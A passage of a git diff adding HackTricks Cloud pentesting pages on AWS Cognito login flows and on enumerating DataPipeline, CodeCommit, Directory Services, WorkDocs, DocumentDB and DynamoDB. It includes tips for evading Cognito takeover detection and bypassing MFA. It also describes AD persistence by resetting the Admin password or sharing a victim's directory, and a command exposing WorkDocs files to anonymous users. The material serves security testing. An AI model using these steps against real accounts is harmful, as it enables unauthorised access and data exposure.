+            UserPoolId=user_pool_id,
+            ClientId=client_id,
+            AuthFlow='ADMIN_USER_PASSWORD_AUTH',
+            AuthParameters={
+                'USERNAME': username_or_alias,
+                'PASSWORD': password,
+                'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret)
+            }
+        )
+    except botocore.exceptions.ClientError as e:
+        return e.response
+
+print(login_user(username, password, client_id, client_secret, user_pool_id))
+```
+
+</details>
+
+### USER\_PASSWORD\_AUTH
+
+This method is another simple and **traditional user & password authentication** flow. It's recommended to **migrate a traditional** authentication method **to Cognito** and **recommended** to then **disable** it and **use** then **ALLOW\_USER\_SRP\_AUTH** method instead (as that one never sends the password over the network).\
+This **method is NOT enabled** by default.
+
+The main **difference** with the **previous auth method** inside the code is that you **don't need to know the user pool ID** and that you **don't need extra permissions** in the Cognito User Pool.
+
+To **login** you **need** to know:
+
+* client id
+* username
+* password
+* client secret (only if the app is configured to use a secret)
+
+{% hint style="info" %}
+In order to be **able to login with this method** that application must allow to login with ALLOW\_USER\_PASSWORD\_AUTH.
+{% endhint %}
+
+```python
+aws cognito-idp initiate-auth  --client-id <client-id> \
+    --auth-flow USER_PASSWORD_AUTH --region <region> \
+    --auth-parameters 'USERNAME=<username>,PASSWORD=<password>,SECRET_HASH=<hash_if_needed>'
+    
+# Check the python code to learn how to generate the secret_hash
+```
+
+<details>
+
+<summary>Python code to Login</summary>
+
+```python
+import boto3
+import botocore
+import hmac
+import hashlib
+import base64
+
+
+client_id = "<client-id>"
+user_pool_id = "<user-pool-id>"
+client_secret = "<client-secret>"
+username = "<username>"
+password = "<pwd>"
+
+boto_client = boto3.client('cognito-idp', region_name='us-east-1')
+
+def get_secret_hash(username, client_id, client_secret):
+    key = bytes(client_secret, 'utf-8')
+    message = bytes(f'{username}{client_id}', 'utf-8')
+    return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode()
+
+# If the Client App isn't configured to use a secret
+## just delete the line setting the SECRET_HASH
+def login_user(username_or_alias, password, client_id, client_secret, user_pool_id):
+    try:
+        return boto_client.initiate_auth(
+            ClientId=client_id,
+            AuthFlow='ADMIN_USER_PASSWORD_AUTH',
+            AuthParameters={
+                'USERNAME': username_or_alias,
+                'PASSWORD': password,
+                'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret)
+            }
+        )
+    except botocore.exceptions.ClientError as e:
+        return e.response
+
+print(login_user(username, password, client_id, client_secret, user_pool_id))
+```
+
+</details>
+
+### USER\_SRP\_AUTH
+
+This is scenario is similar to the previous one but **instead of of sending the password** through the network to login a **challenge authentication is performed** (so no password navigating even encrypted through he net).\
+This **method is enabled** by default.
+
+To **login** you **need** to know:
+
+* user pool id
+* client id
+* username
+* password
+* client secret (only if the app is configured to use a secret)
+
+<details>
+
+<summary>Code to login</summary>
+
+```python
+from warrant.aws_srp import AWSSRP
+import os
+
+USERNAME='xxx'
+PASSWORD='yyy'
+POOL_ID='us-east-1_zzzzz'
+CLIENT_ID = '12xxxxxxxxxxxxxxxxxxxxxxx'
+CLIENT_SECRET = 'secreeeeet'
+os.environ["AWS_DEFAULT_REGION"] = "<region>"
+
+aws = AWSSRP(username=USERNAME, password=PASSWORD, pool_id=POOL_ID, 
+    client_id=CLIENT_ID, client_secret=CLIENT_SECRET)
+tokens = aws.authenticate_user()
+id_token = tokens['AuthenticationResult']['IdToken']
+refresh_token = tokens['AuthenticationResult']['RefreshToken']
+access_token = tokens['AuthenticationResult']['AccessToken']
+token_type = tokens['AuthenticationResult']['TokenType']
+```
+
+</details>
+
+### REFRESH\_TOKEN\_AUTH & REFRESH\_TOKEN
+
+This **method is always going to be valid** (it cannot be disabled) but you need to have a valid refresh token.
+
+```bash
+aws cognito-idp initiate-auth \
+    --client-id 3ig6h5gjm56p1ljls1prq2miut \
+    --auth-flow REFRESH_TOKEN_AUTH \
+    --region us-east-1 \
+    --auth-parameters 'REFRESH_TOKEN=<token>'
+```
+
+<details>
+
+<summary>Code to refresh</summary>
+
+```python
+import boto3
+import botocore
+import hmac
+import hashlib
+import base64
+
+client_id = "<client-id>"
+token = '<token>'
+
+boto_client = boto3.client('cognito-idp', region_name='<region>')
+
+def refresh(client_id, refresh_token):
+    try:
+        return boto_client.initiate_auth(
+            ClientId=client_id,
+            AuthFlow='REFRESH_TOKEN_AUTH',
+            AuthParameters={
+                'REFRESH_TOKEN': refresh_token
+            }
+        )
+    except botocore.exceptions.ClientError as e:
+        return e.response
+
+
+print(refresh(client_id, token))
+```
+
+</details>
+
+### CUSTOM\_AUTH
+
+In this case the **authentication** is going to be performed through the **execution of a lambda function**.
+
+## Extra Security
+
+### Advanced Security
+
+By default it's disabled, but if enabled, Cognito could be able to **find account takeovers**. To minimise the probability you should login from a **network inside the same city, using the same user agent** (and IP is thats possible)**.**
+
+### **MFA Remember device**
+
+If the user logins from the same device, the MFA might be bypassed, therefore try to login from the same browser with the same metadata (IP?) to try to bypass the MFA protection.
+
+## User Pool Groups IAM Roles
+
+It's possible to add **users to User Pool** groups that are related to one **IAM roles**.\
+Moreover, **users** can be assigned to **more than 1 group with different IAM roles** attached.
+
+Note that even if a group is inside a group with an IAM role attached, in order to be able to access IAM credentials of that group it's needed that the **User Pool is trusted by an Identity Pool** (and know the details of that Identity Pool).
+
+Another requisite to get the **IAM role indicated in the IdToken** when a user is authenticated in the User Pool (`aws cognito-idp initiate-auth...`) is that the **Identity Provider Authentication provider** needs indicate that the **role must be selected from the token.**
+
+<figure><img src="../../../../.gitbook/assets/image (250).png" alt=""><figcaption></figcaption></figure>
+
+The **roles** a user have access to are **inside the `IdToken`**, and a user can **select which role he would like credentials for** with the **`--custom-role-arn`** from `aws cognito-identity get-credentials-for-identity`.\
+However, if the **default option** is the one **configured** (`use default role`), and you try to access a role from the IdToken, you will get **error** (that's why the previous configuration is needed):
+
+{% code overflow="wrap" %}
+```
+An error occurred (InvalidParameterException) when calling the GetCredentialsForIdentity operation: Only SAML providers and providers with RoleMappings support custom role ARN.
+```
+{% endcode %}
+
+{% hint style="warning" %}
+Note that the role assigned to a **User Pool Group** needs to be **accesible by the Identity Provider** that **trust the User Pool** (as the IAM role **session credentials are going to be obtained from it**).
+{% endhint %}
+
+```json
+{
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Effect": "Allow",
+            "Principal": {
+                "Federated": "cognito-identity.amazonaws.com"
+            },
+            "Action": "sts:AssumeRoleWithWebIdentity",
+            "Condition": {
+                "StringEquals": {
+                    "cognito-identity.amazonaws.com:aud": "us-east-1:2361092e-9db6-a876-1027-10387c9de439"
+                },
+                "ForAnyValue:StringLike": {
+                    "cognito-identity.amazonaws.com:amr": "authenticated"
+                }
+            }
+        }
+    ]
+}js
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md b/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md
new file mode 100644
index 0000000000..bc391a196b
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md
@@ -0,0 +1,129 @@
+# AWS - DataPipeline, CodePipeline & CodeCommit Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## DataPipeline
+
+AWS Data Pipeline is designed to facilitate the **access, transformation, and efficient transfer** of data at scale. It allows the following operations to be performed:
+
+1. **Access Your Data Where It’s Stored**: Data residing in various AWS services can be accessed seamlessly.
+2. **Transform and Process at Scale**: Large-scale data processing and transformation tasks are handled efficiently.
+3. **Efficiently Transfer Results**: The processed data can be efficiently transferred to multiple AWS services including:
+   * Amazon S3
+   * Amazon RDS
+   * Amazon DynamoDB
+   * Amazon EMR
+
+In essence, AWS Data Pipeline streamlines the movement and processing of data between different AWS compute and storage services, as well as on-premises data sources, at specified intervals.
+
+### Enumeration
+
+```bash
+aws datapipeline list-pipelines
+aws datapipeline describe-pipelines --pipeline-ids <ID>
+aws datapipeline list-runs --pipeline-id <ID>
+aws datapipeline get-pipeline-definition --pipeline-id <ID>
+```
+
+### Privesc
+
+In the following page you can check how to **abuse datapipeline permissions to escalate privileges**:
+
+{% content-ref url="../aws-privilege-escalation/aws-datapipeline-privesc.md" %}
+[aws-datapipeline-privesc.md](../aws-privilege-escalation/aws-datapipeline-privesc.md)
+{% endcontent-ref %}
+
+## CodePipeline
+
+AWS CodePipeline is a fully managed **continuous delivery service** that helps you **automate your release pipelines** for fast and reliable application and infrastructure updates. CodePipeline automates the **build, test, and deploy phases** of your release process every time there is a code change, based on the release model you define.
+
+### Enumeration
+
+```bash
+aws codepipeline list-pipelines
+aws codepipeline get-pipeline --name <pipeline_name>
+aws codepipeline list-action-executions --pipeline-name <pl_name>
+aws codepipeline list-pipeline-executions --pipeline-name <pl_name>
+aws codepipeline list-webhooks
+aws codepipeline get-pipeline-state --name <pipeline_name>
+```
+
+### Privesc
+
+In the following page you can check how to **abuse codepipeline permissions to escalate privileges**:
+
+{% content-ref url="../aws-privilege-escalation/aws-codepipeline-privesc.md" %}
+[aws-codepipeline-privesc.md](../aws-privilege-escalation/aws-codepipeline-privesc.md)
+{% endcontent-ref %}
+
+## CodeCommit
+
+It is a **version control service**, which is hosted and fully managed by Amazon, which can be used to privately store data (documents, binary files, source code) and manage them in the cloud.
+
+It **eliminates** the requirement for the user to know Git and **manage their own source control system** or worry about scaling up or down their infrastructure. Codecommit supports all the standard **functionalities that can be found in Git**, which means it works effortlessly with user’s current Git-based tools.
+
+### Enumeration
+
+```bash
+# Repos
+aws codecommit list-repositories
+aws codecommit get-repository --repository-name <name>
+aws codecommit get-repository-triggers --repository-name <name>
+aws codecommit list-branches --repository-name <name>
+aws codecommit list-pull-requests --repository-name <name>
+
+# Approval rules
+aws codecommit list-approval-rule-templates
+aws codecommit get-approval-rule-template --approval-rule-template-name <name>
+aws codecommit list-associated-approval-rule-templates-for-repository --repository-name <name>
+
+# Get & Put files
+## Get a file
+aws codecommit get-file --repository-name backend-api --file-path app.py
+## Put a file
+aws codecommit get-branch --repository-name backend-api --branch-name master
+aws codecommit put-file --repository-name backend-api --branch-name master --file-content fileb://./app.py --file-path app.py --parent-commit-id <commit-id>
+
+# SSH Keys & Clone repo
+## Get codecommit keys
+aws iam list-ssh-public-keys #User keys for CodeCommit
+aws iam get-ssh-public-key --user-name <username> --ssh-public-key-id <id> --encoding SSH #Get public key with metadata
+# The previous command will give you the fingerprint of the ssh key
+# With the next command you can check the fingerprint of an ssh key and compare them
+ssh-keygen -f .ssh/id_rsa -l -E md5
+
+# Clone repo
+git clone ssh://<SSH-KEY-ID>@git-codecommit.<REGION>.amazonaws.com/v1/repos/<repo-name>
+```
+
+## References
+
+* [https://docs.aws.amazon.com/whitepapers/latest/aws-overview/analytics.html](https://docs.aws.amazon.com/whitepapers/latest/aws-overview/analytics.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md b/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md
new file mode 100644
index 0000000000..e659755c57
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md
@@ -0,0 +1,147 @@
+# AWS - Directory Services / WorkDocs Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Directory Services
+
+AWS Directory Service for Microsoft Active Directory is a managed service that makes it easy to **set up, operate, and scale a directory** in the AWS Cloud. It is built on actual **Microsoft Active Directory** and integrates tightly with other AWS services, making it easy to manage your directory-aware workloads and AWS resources. With AWS Managed Microsoft AD, you can **use your existing** Active Directory users, groups, and policies to manage access to your AWS resources. This can help simplify your identity management and reduce the need for additional identity solutions. AWS Managed Microsoft AD also provides automatic backups and disaster recovery capabilities, helping to ensure the availability and durability of your directory. Overall, AWS Directory Service for Microsoft Active Directory can help you save time and resources by providing a managed, highly available, and scalable Active Directory service in the AWS Cloud.
+
+### Options
+
+Directory Services allows to create 5 types of directories:
+
+* **AWS Managed Microsoft AD**: Which will run a new **Microsoft AD in AWS**. You will be able to set the admin password and access the DCs in a VPC.
+* **Simple AD**: Which will be a **Linux-Samba** Active Directory–compatible server. You will be able to set the admin password and access the DCs in a VPC.
+* **AD Connector**: A proxy for **redirecting directory requests to your existing Microsoft Active Directory** without caching any information in the cloud. It will be listening in a **VPC** and you need to give **credentials to access the existing AD**.
+* **Amazon Cognito User Pools**: This is the same as Cognito User Pools.
+* **Cloud Directory**: This is the **simplest** one. A **serverless** directory where you indicate the **schema** to use and are **billed according to the usage**.
+
+AWS Directory services allows to **synchronise** with your existing **on-premises** Microsoft AD, **run your own one** in AWS or synchronize with **other directory types**.
+
+### Lab
+
+Here you can find a nice tutorial to create you own Microsoft AD in AWS: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms\_ad\_tutorial\_test\_lab\_base.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html)
+
+### Enumeration
+
+```bash
+# Get directories and DCs
+aws ds describe-directories
+aws ds describe-domain-controllers --directory-id <id>
+# Get directory settings
+aws ds describe-trusts
+aws ds describe-ldaps-settings --directory-id <id>
+aws ds describe-shared-directories --owner-directory-id <id>
+aws ds get-directory-limits
+aws ds list-certificates --directory-id <id>
+aws ds describe-certificate --directory-id <id> --certificate-id <id>
+```
+
+### Login
+
+Note that if the **description** of the directory contained a **domain** in the field **`AccessUrl`** it's because a **user** can probably **login** with its **AD credentials** in some **AWS services:**
+
+* `<name>.awsapps.com/connect` (Amazon Connect)
+* `<name>.awsapps.com/workdocs` (Amazon WorkDocs)
+* `<name>.awsapps.com/workmail` (Amazon WorkMail)
+* `<name>.awsapps.com/console` (Amazon Management Console)
+* `<name>.awsapps.com/start` (IAM Identity Center)
+
+### Privilege Escalation
+
+{% content-ref url="../aws-privilege-escalation/aws-directory-services-privesc.md" %}
+[aws-directory-services-privesc.md](../aws-privilege-escalation/aws-directory-services-privesc.md)
+{% endcontent-ref %}
+
+## Persistence
+
+### Using an AD user
+
+An **AD user** can be given **access over the AWS management console** via a Role to assume. The **default username is Admin** and it's possible to **change its password** from AWS console.
+
+Therefore, it's possible to **change the password of Admin**, **create a new user** or **change the password** of a user and grant that user a Role to maintain access.\
+It's also possible to **add a user to a group inside AD** and **give that AD group access to a Role** (to make this persistence more stealth).
+
+### Sharing AD (from victim to attacker)
+
+It's possible to share an AD environment from a victim to an attacker. This way the attacker will be able to continue accessing the AD env.\
+However, this implies sharing the managed AD and also creating an VPC peering connection.
+
+You can find a guide here: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1\_setup\_networking.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html)
+
+### ~~Sharing AD (from attacker to victim)~~
+
+It doesn't look like possible to grant AWS access to users from a different AD env to one AWS account.
+
+## WorkDocs
+
+Amazon Web Services (AWS) WorkDocs is a cloud-based **file storage and sharing service**. It is part of the AWS suite of cloud computing services and is designed to provide a secure and scalable solution for organizations to store, share, and collaborate on files and documents.
+
+AWS WorkDocs provides a web-based interface for users to upload, access, and manage their files and documents. It also offers features such as version control, real-time collaboration, and integration with other AWS services and third-party tools.
+
+### Enumeration
+
+{% code overflow="wrap" %}
+```bash
+# Get AD users (Admin not included)
+aws workdocs describe-users --organization-id <directory-id>
+# Get AD groups (containing "a")
+aws workdocs describe-groups --organization-id d-9067a0285c --search-query a
+
+# Create user (created inside the AD)
+aws workdocs create-user --username testingasd --given-name testingasd --surname testingasd --password <password> --email-address name@directory.domain --organization-id <directory-id>
+
+# Get what each user has created
+aws workdocs describe-activities --user-id "S-1-5-21-377..."
+
+# Get what was created in the directory
+aws workdocs describe-activities --organization-id <directory-id>
+
+# Get folder content
+aws workdocs describe-folder-contents --folder-id <fold-id>
+
+# Get file (a url to access with the content will be retreived)
+aws workdocs get-document --document-id <doc-id>
+
+# Get resource permissions if any
+aws workdocs describe-resource-permissions --resource-id <value>
+
+# Add permission so anyway can see the file
+aws workdocs add-resource-permissions --resource-id <id> --principals Id=anonymous,Type=ANONYMOUS,Role=VIEWER
+## This will give an id, the file will be acesible in: https://<name>.awsapps.com/workdocs/index.html#/share/document/<id>
+```
+{% endcode %}
+
+### Privesc
+
+{% content-ref url="../aws-privilege-escalation/aws-workdocs-privesc.md" %}
+[aws-workdocs-privesc.md](../aws-privilege-escalation/aws-workdocs-privesc.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md b/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md
new file mode 100644
index 0000000000..b19805d717
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md
@@ -0,0 +1,66 @@
+# AWS - DocumentDB Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## DocumentDB
+
+Amazon DocumentDB, offering compatibility with MongoDB, is presented as a **fast, reliable, and fully managed database service**. Designed for simplicity in deployment, operation, and scalability, it allows the **seamless migration and operation of MongoDB-compatible databases in the cloud**. Users can leverage this service to execute their existing application code and utilize familiar drivers and tools, ensuring a smooth transition and operation akin to working with MongoDB.
+
+### Enumeration
+
+```bash
+aws docdb describe-db-clusters # Get username from "MasterUsername", get also the endpoint from "Endpoint"
+aws docdb describe-db-instances #Get hostnames from here
+
+# Parameter groups
+aws docdb describe-db-cluster-parameter-groups
+aws docdb describe-db-cluster-parameters --db-cluster-parameter-group-name <param_group_name>
+
+# Snapshots
+aws docdb describe-db-cluster-snapshots
+aws --region us-east-1 --profile ad docdb describe-db-cluster-snapshot-attributes --db-cluster-snapshot-identifier <snap_id>
+```
+
+### NoSQL Injection
+
+As DocumentDB is a MongoDB compatible database, you can imagine it's also vulnerable to common NoSQL injection attacks:
+
+{% embed url="https://book.hacktricks.xyz/pentesting-web/nosql-injection" %}
+
+### DocumentDB
+
+{% content-ref url="../aws-unauthenticated-enum-access/aws-documentdb-enum.md" %}
+[aws-documentdb-enum.md](../aws-unauthenticated-enum-access/aws-documentdb-enum.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/](https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md b/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md
new file mode 100644
index 0000000000..97e9beeae1
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md
@@ -0,0 +1,206 @@
+# AWS - DynamoDB Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## DynamoDB
+
+### Basic Information
+
+Amazon DynamoDB is presented by AWS as a **fully managed, serverless, key-value NoSQL database**, tailored for powering high-performance applications regardless of their size. The service ensures robust features including inherent security measures, uninterrupted backups, automated replication across multiple regions, integrated in-memory caching, and convenient data export utilities.
+
+In the context of DynamoDB, instead of establishing a traditional database, **tables are created**. Each table mandates the specification of a **partition key** as an integral component of the **table's primary key**. This partition key, essentially a **hash value**, plays a critical role in both the retrieval of items and the distribution of data across various hosts. This distribution is pivotal for maintaining both scalability and availability of the database. Additionally, there's an option to incorporate a **sort key** to further refine data organization.
+
+### Encryption
+
+By default, DynamoDB uses a KMS key that \*\*belongs to Amazon DynamoDB,\*\*not even the AWS managed key that at least belongs to your account.
+
+<figure><img src="https://lh4.googleusercontent.com/JjtNS7aA-_GRMgZb4v93jWEQJi6DQdUPq0FEpzZPdeyCeNoG05p0NJiV9Zs-ULs_-Tfjmx0W1ZgsE2Ui2ljo7D-1a87Xny-gpLVQO0XmXdFoph9ci1RepbVNwaCe9oPruEZSEDxGTxF5dIv6pW1WpT6kWA=s2048" alt=""><figcaption></figcaption></figure>
+
+### Backups & Export to S3
+
+It's possible to **schedule** the generation of **table backups** or create them on **demand**. Moreover, it's also possible to enable **Point-in-time recovery (PITR) for a table.** Point-in-time recovery provides continuous **backups** of your DynamoDB data for **35 days** to help you protect against accidental write or delete operations.
+
+It's also possible to export **the data of a table to S3**, but the table needs to have **PITR enabled**.
+
+### GUI
+
+There is a GUI for local Dynamo services like [DynamoDB Local](https://aws.amazon.com/blogs/aws/dynamodb-local-for-desktop-development/), [dynalite](https://github.com/mhart/dynalite), [localstack](https://github.com/localstack/localstack), etc, that could be useful: [https://github.com/aaronshaf/dynamodb-admin](https://github.com/aaronshaf/dynamodb-admin)
+
+### Enumeration
+
+```bash
+# Tables
+aws dynamodb list-tables 
+aws dynamodb describe-table --table-name <t_name> #Get metadata info
+## The primary key and sort key will appear inside the KeySchema field
+
+#Check if point in time recovery is enabled
+aws dynamodb describe-continuous-backups \
+  --table-name tablename
+
+# Backups
+aws dynamodb list-backups
+aws dynamodb describe-backup --backup-arn <arn>
+aws dynamodb describe-continuous-backups --table-name <t_name>
+
+# Global tables
+aws dynamodb list-global-tables
+aws dynamodb describe-global-table --global-table-name <name>
+
+# Exports
+aws dynamodb list-exports
